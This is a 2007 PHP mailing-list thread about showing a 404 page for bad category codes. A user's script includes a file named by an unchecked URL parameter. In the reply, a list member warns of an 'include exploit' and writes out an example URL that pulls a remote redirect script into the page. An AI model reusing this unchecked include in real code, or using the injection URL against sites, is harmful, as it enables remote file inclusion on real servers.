Yes but this file does not exist. It is just to use for my queries. so I think I cannot use the file_exists function. Which other function I would use to do this? I already have setup the .htaccess file to point also to a 404 page. but this works only if the URL is totally wrong. like www.arubaguide.org/blabla but not www.arubaguide.org/categories.php?catcode=blabla "Davi" <davividal@xxxxxxxxxxxxxxxx> wrote in message news:200703301324.01518.davividal@xxxxxxxxxxxxxxxxxxx Em Sexta 30 Março 2007 13:17, Dwayne Heronimo escreveu: > where getting there .. now i have this.. but now it will only show the 404 > page. I think somehow that the firstpart is not working? the include part? > http://arubaguide.org/arubaguide/categories.php?catcode=activities > > > <?php require_once('../Connections/arubaguide.php'); ?> > > <?php > > $cat_item = $_GET['catcode']; > if(file_exists($cat_item)) { > include "$cat_item"; > } > else { > include "404.php"; > exit; > } > include exploit: arq_inc.htm: <script> window.location="www.mypage.com"; </script> then: www.yourpage.com/script.php?catcode=http://www.mypage.com/arc_inc.htm o/ -- Davi Vidal davividal@xxxxxxxxxxxxxxxx davividal@xxxxxxxxx -- Agora com fortune: ""The government is not the surplus's money, Vice President." George W. Bush November 5, 2000 >From The Washington Post." -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
